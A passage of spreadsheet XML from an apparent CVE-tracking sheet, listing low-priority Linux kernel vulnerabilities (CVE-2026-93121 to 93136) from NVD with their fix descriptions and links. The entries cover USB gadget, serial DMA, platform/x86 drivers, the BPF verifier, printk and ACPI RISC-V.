      </c>
      <c r="P937" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q937" s="5" t="inlineStr"/>
      <c r="R937" s="5" t="inlineStr"/>
      <c r="S937" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_fs: Fix fence cleanup in ffs_dmabuf_transfer() error paths
The error paths for endpoint-disabled (ESHUTDOWN) and request-allocation
failure (ENOMEM) in ffs_dmabuf_transfer() jump to err_fence_put which
calls dma_fence_put() on the fence. However, at that point the fence has
only been kmalloc'd — dma_fence_init() has not been called yet, so the
refcount and the fence ops are uninitialized. Calling dma_fence_put() on
such an object leads to undefined behavior.
Use kfree() instead, since the fence is just a plain allocation at this
stage, and rename the label to err_fence_free to reflect the actual
cleanup action.</t>
        </is>
      </c>
      <c r="T937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93121</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93122</t>
        </is>
      </c>
      <c r="D938" s="5" t="inlineStr"/>
      <c r="E938" s="5" t="inlineStr"/>
      <c r="F938" s="5" t="inlineStr"/>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="inlineStr"/>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q938" s="5" t="inlineStr"/>
      <c r="R938" s="5" t="inlineStr"/>
      <c r="S938" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: uac: validate rate list length before storing
UAC1 and UAC2 configfs rate-list attributes parse a comma-separated
list of sampling rates and store each parsed value in fixed-size arrays.
The arrays have UAC_MAX_RATES entries, but the store paths do not check
that the input contains at most that many tokens before writing through
opts-&gt;name##s[i++].
Writing more than ten rates therefore writes past the end of the
p_srates[] or c_srates[] array in struct f_uac1_opts or struct
f_uac2_opts.
With CONFIG_UBSAN_BOUNDS enabled, writing an 11-entry rate list to the
UAC1 p_srate attribute reports:
  UBSAN: array-index-out-of-bounds
  drivers/usb/gadget/function/f_uac1.c:1669:1
  index 10 is out of range for type 'int [10]'
  __ubsan_handle_out_of_bounds.cold
  f_uac1_opts_p_srate_store
  configfs_write_iter
  vfs_write
  ksys_write
  do_syscall_64
The same reproducer against the UAC2 p_srate attribute reports:
  UBSAN: array-index-out-of-bounds
  drivers/usb/gadget/function/f_uac2.c:2087:1
  index 10 is out of range for type 'int [10]'
  __ubsan_handle_out_of_bounds.cold
  f_uac2_opts_p_srate_store
  configfs_write_iter
  vfs_write
  ksys_write
  do_syscall_64
Reject additional tokens once UAC_MAX_RATES entries have been parsed.
Also keep the original kstrdup() pointer for kfree(), because strsep()
advances the parsing cursor. Freeing the advanced cursor leaks the
original buffer on successful parses and can free an interior pointer on
some error paths.</t>
        </is>
      </c>
      <c r="T938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93122</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93123</t>
        </is>
      </c>
      <c r="D939" s="5" t="inlineStr"/>
      <c r="E939" s="5" t="inlineStr"/>
      <c r="F939" s="5" t="inlineStr"/>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="inlineStr"/>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr"/>
      <c r="L939" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q939" s="5" t="inlineStr"/>
      <c r="R939" s="5" t="inlineStr"/>
      <c r="S939" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: qcom-geni: do not advance stale DMA completions
The qcom GENI serial DMA TX completion path advances the transmit fifo by
the number of bytes recorded in port-&gt;tx_remaining.
If uart_flush_buffer() runs after the hardware has completed a DMA
transfer but before the DMA completion interrupt has been handled, the
serial core resets the transmit fifo while port-&gt;tx_remaining still
describes the old DMA transfer.
A previous fix avoided advancing an empty fifo by checking that the fifo
length is at least tx_remaining. That still does not distinguish the old
DMA payload from new bytes written after the flush. If userspace writes
new data before the stale DMA completion interrupt is handled, the fifo
can again contain at least tx_remaining bytes and the stale completion
can advance and discard those new bytes.
Mark an in-flight DMA transfer stale when the transmit fifo is flushed.
The later completion still unprepares the original DMA mapping using the
saved length, but it no longer advances the transmit fifo.</t>
        </is>
      </c>
      <c r="T939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93123</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93124</t>
        </is>
      </c>
      <c r="D940" s="5" t="inlineStr"/>
      <c r="E940" s="5" t="inlineStr"/>
      <c r="F940" s="5" t="inlineStr"/>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="inlineStr"/>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr"/>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q940" s="5" t="inlineStr"/>
      <c r="R940" s="5" t="inlineStr"/>
      <c r="S940" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: asus-wireless: Fail probe when there is no ACPI match
Every platform driver can be forced to match a device that does not match
its list of device IDs because of device_match_driver_override(), so
platform drivers that rely on the existence of a device ACPI companion
object need to verify its presence.
asus_wireless_probe() returns success when acpi_match_acpi_device()
finds no match, leaving behind an input device that never reports
anything because the notify handler is not installed.  Worse, when the
driver is force-bound to a device without an ACPI companion, probe
still succeeds and stores a NULL companion pointer, which
asus_wireless_remove() later passes to acpi_dev_remove_notify_handler(),
leading to a NULL pointer dereference on unbind.
Return -ENODEV when the device does not match the ID table.  This also
covers the missing-companion case, because acpi_match_acpi_device()
rejects a NULL device.  Perform the check before allocating any driver
state, instead of after the input device has already been registered.</t>
        </is>
      </c>
      <c r="T940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93124</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93125</t>
        </is>
      </c>
      <c r="D941" s="5" t="inlineStr"/>
      <c r="E941" s="5" t="inlineStr"/>
      <c r="F941" s="5" t="inlineStr"/>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="inlineStr"/>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr"/>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q941" s="5" t="inlineStr"/>
      <c r="R941" s="5" t="inlineStr"/>
      <c r="S941" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject rdonly/rdwr_buf_size kfunc arguments that exceed u32 max
check_kfunc_args() detects a kfunc argument named rdonly_buf_size or
rdwr_buf_size and stores reg-&gt;var_off.value into meta-&gt;r0_size, a u64,
and does not bound it. check_kfunc_call() later copies that value into
the returned register's mem_size field:
  meta-&gt;r0_size = reg-&gt;var_off.value;
  ...
  regs[BPF_REG_0].mem_size = meta.r0_size;
regs[BPF_REG_0].mem_size is u32. A constant whose upper 32 bits are set
gets truncated instead of causing a load-time rejection, so the verifier
records a PTR_TO_MEM register with an approximately 4 GiB mem_size for
whatever allocation the kfunc returned. A later access check against
that register uses the truncated, wrong bound.
Reject rdonly_buf_size/rdwr_buf_size values that exceed U32_MAX at the
point meta-&gt;r0_size is set.</t>
        </is>
      </c>
      <c r="T941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93125</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93126</t>
        </is>
      </c>
      <c r="D942" s="5" t="inlineStr"/>
      <c r="E942" s="5" t="inlineStr"/>
      <c r="F942" s="5" t="inlineStr"/>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="inlineStr"/>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr"/>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q942" s="5" t="inlineStr"/>
      <c r="R942" s="5" t="inlineStr"/>
      <c r="S942" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: qcom_q6v5_adsp: Fix reference leak for device node
When calling of_parse_phandle_with_args(), the caller is responsible
to call of_node_put() to release the reference of device node.
In adsp_map_carveout, it does not release the reference.</t>
        </is>
      </c>
      <c r="T942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93126</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93127</t>
        </is>
      </c>
      <c r="D943" s="5" t="inlineStr"/>
      <c r="E943" s="5" t="inlineStr"/>
      <c r="F943" s="5" t="inlineStr"/>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="inlineStr"/>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr"/>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q943" s="5" t="inlineStr"/>
      <c r="R943" s="5" t="inlineStr"/>
      <c r="S943" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Drop scalar id on sign-extending narrowing stack fills
When a spilled scalar is filled back with a sign-extending narrowing load
(BPF_MEMSX), check_stack_read_fixed_off() copies the spilled register
including its scalar id, but coerce_reg_to_size_sx() then sign-extends the
filled register's value. If the same slot is also filled with a plain
zero-extending load (BPF_MEM), both destination registers share the id yet
hold different values. A later 'if &lt;zext-reg&gt; == const' then refines the
sign-extended register through sync_linked_regs() to a value it does not
have at runtime (e.g. the verifier believes 0x80000000 while the register
is 0xffffffff80000000), which can be turned into an out-of-bounds access.
Drop the shared scalar id at the sign-extension site in check_mem_access()
when sign extension actually changes the value, mirroring the BPF_MOVSX
handling in check_alu_op() (no_sext = reg_umax &lt; 2^(size*8-1)).</t>
        </is>
      </c>
      <c r="T943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93127</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93128</t>
        </is>
      </c>
      <c r="D944" s="5" t="inlineStr"/>
      <c r="E944" s="5" t="inlineStr"/>
      <c r="F944" s="5" t="inlineStr"/>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="inlineStr"/>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q944" s="5" t="inlineStr"/>
      <c r="R944" s="5" t="inlineStr"/>
      <c r="S944" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: lg-laptop: Fix LED resource handling
The event notification callback might access kbd_backlight even
when it was not successfully registered with the LED subsystem.
The same happens inside acpi_remove(), where the LED devices are
unregistered unconditionally.
Fix this by tracking the availability of the kbd_backlight LED
device and use devm_led_classdev_register() to let devres take
care of unregistering the LED devices during removal. For this
the parent device of the LED devices is changed to the native
platform device.</t>
        </is>
      </c>
      <c r="T944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93128</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93129</t>
        </is>
      </c>
      <c r="D945" s="5" t="inlineStr"/>
      <c r="E945" s="5" t="inlineStr"/>
      <c r="F945" s="5" t="inlineStr"/>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="inlineStr"/>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q945" s="5" t="inlineStr"/>
      <c r="R945" s="5" t="inlineStr"/>
      <c r="S945" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-wmi-base: Fix handling of ultra performance key
The commit message of commit 5fbd827eb9c2 ("platform/x86: dell-wmi: Recognise or support new switches")
states that the ultra performance key contains additional data
after the type and code fields. The event data passed to
dell_wmi_process_key() is already parsed, so "buffer" already
starts after those two fields.
Use the correct index for accessing the first data field to avoid
a potential buffer overread.</t>
        </is>
      </c>
      <c r="T945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93129</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93130</t>
        </is>
      </c>
      <c r="D946" s="5" t="inlineStr"/>
      <c r="E946" s="5" t="inlineStr"/>
      <c r="F946" s="5" t="inlineStr"/>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="inlineStr"/>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr"/>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q946" s="5" t="inlineStr"/>
      <c r="R946" s="5" t="inlineStr"/>
      <c r="S946" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-wmi-base: Fix resource leak on module load failure
We need to properly clean up the SMBIOS request and the privacy driver
when the module load fails.</t>
        </is>
      </c>
      <c r="T946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93130</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93131</t>
        </is>
      </c>
      <c r="D947" s="5" t="inlineStr"/>
      <c r="E947" s="5" t="inlineStr"/>
      <c r="F947" s="5" t="inlineStr"/>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="inlineStr"/>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr"/>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q947" s="5" t="inlineStr"/>
      <c r="R947" s="5" t="inlineStr"/>
      <c r="S947" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-privacy: Fix race condition
Accessing priv-&gt;features_present needs to happen with the list mutex
being held, otherwise priv can be freed at any moment.</t>
        </is>
      </c>
      <c r="T947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93131</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93132</t>
        </is>
      </c>
      <c r="D948" s="5" t="inlineStr"/>
      <c r="E948" s="5" t="inlineStr"/>
      <c r="F948" s="5" t="inlineStr"/>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="inlineStr"/>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr"/>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q948" s="5" t="inlineStr"/>
      <c r="R948" s="5" t="inlineStr"/>
      <c r="S948" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: RISC-V: Fix riscv_acpi_add_prt_dep() loop handling
The loop in riscv_acpi_add_prt_dep() includes error conditions that are
handled in a dubious - if not outright wrong - way, by continuining the
loop (which skips and misses the entry pointer update to point to the next
entry).
Rewrite the loop as a for loop (that handles the continuation correctly)
and wrap the condition and update statements using helper functions to make
it cleaner.</t>
        </is>
      </c>
      <c r="T948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93132</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93133</t>
        </is>
      </c>
      <c r="D949" s="5" t="inlineStr"/>
      <c r="E949" s="5" t="inlineStr"/>
      <c r="F949" s="5" t="inlineStr"/>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="inlineStr"/>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr"/>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q949" s="5" t="inlineStr"/>
      <c r="R949" s="5" t="inlineStr"/>
      <c r="S949" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: RISC-V: Check acpi_get_handle() status in riscv_acpi_add_prt_dep()
In riscv_acpi_add_prt_dep(), the acpi_get_handle() call can fail which
would leave link_handle uninitialized.
Fix it by checking the acpi_get_handle() return status and skip the entry
if it fails.</t>
        </is>
      </c>
      <c r="T949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93133</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93134</t>
        </is>
      </c>
      <c r="D950" s="5" t="inlineStr"/>
      <c r="E950" s="5" t="inlineStr"/>
      <c r="F950" s="5" t="inlineStr"/>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="inlineStr"/>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr"/>
      <c r="L950" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q950" s="5" t="inlineStr"/>
      <c r="R950" s="5" t="inlineStr"/>
      <c r="S950" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
printk: Fix possible console use-after-free
When emitting a record via legacy printing, it is possible that a handover
to another legacy printing context occurs. When a context has performed a
handover, the console SRCU read lock is released and the pointer to the
console struct might now be invalid. Therefore, after calling
nbcon_legacy_emit_next_record() or console_emit_next_record(), it is
necessary to check if a handover occurred _before_ further @con usage.
Sashiko pointed out that console_flush_one_record() was not doing this.
In console_flush_one_record(), after emitting a record, move the further
usage of @con after the handover check.</t>
        </is>
      </c>
      <c r="T950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93134</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93135</t>
        </is>
      </c>
      <c r="D951" s="5" t="inlineStr"/>
      <c r="E951" s="5" t="inlineStr"/>
      <c r="F951" s="5" t="inlineStr"/>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="inlineStr"/>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr"/>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q951" s="5" t="inlineStr"/>
      <c r="R951" s="5" t="inlineStr"/>
      <c r="S951" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject programs with inlined helpers if JIT is not available
When an architecture (such as LoongArch, ARM64, and RISC-V) implements
bpf_jit_inlines_helper_call(), the verifier skips rewriting the helper
call offset (insn-&gt;imm) in bpf_do_misc_fixups(). This is because the
helper is expected to be inlined by the JIT compiler later. Therefore,
insn-&gt;imm remains as the raw helper enum ID.
However, if JIT is disabled at runtime (net.core.bpf_jit_enable=0) or
if JIT compilation fails dynamically (e.g., due to OOM), the program
falls back to the BPF interpreter.
When the interpreter executes (__bpf_call_base + insn-&gt;imm) with the
unpatched raw ID, it jumps into an invalid address space, triggering
an instruction alignment fault or a kernel panic.
Although these helpers have valid C implementations in the kernel, the
omission of offset rewriting makes runtime interpreter fallback fatal.
Fix this by setting 'prog-&gt;jit_required = 1' when helper call rewriting
is skipped for JIT inlining. This ensures that such programs are safely
rejected if JIT is not available, preventing the runtime kernel panic.</t>
        </is>
      </c>
      <c r="T951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93135</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93136</t>
        </is>
      </c>
      <c r="D952" s="5" t="inlineStr"/>
      <c r="E952" s="5" t="inlineStr"/>
      <c r="F952" s="5" t="inlineStr"/>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="inlineStr"/>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q952" s="5" t="inlineStr"/>
      <c r="R952" s="5" t="inlineStr"/>
      <c r="S952" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: ep: Fix device refcount leak in the error path of MHI device creation
mhi_ep_create_device() takes one device reference for the UL channel and
